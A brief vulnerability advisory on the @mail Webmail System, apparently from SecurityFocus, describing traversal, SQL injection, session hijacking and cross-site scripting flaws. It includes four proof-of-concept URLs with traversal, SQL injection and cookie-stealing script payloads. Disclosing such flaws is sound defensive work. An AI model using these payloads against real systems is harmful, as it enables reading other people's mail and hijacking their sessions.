source: https://www.securityfocus.com/bid/9180/info
It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.
http://www.example.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox
http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1
http://www.example.com/parse.pl?file=html/english/xp/xplogin.html
http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
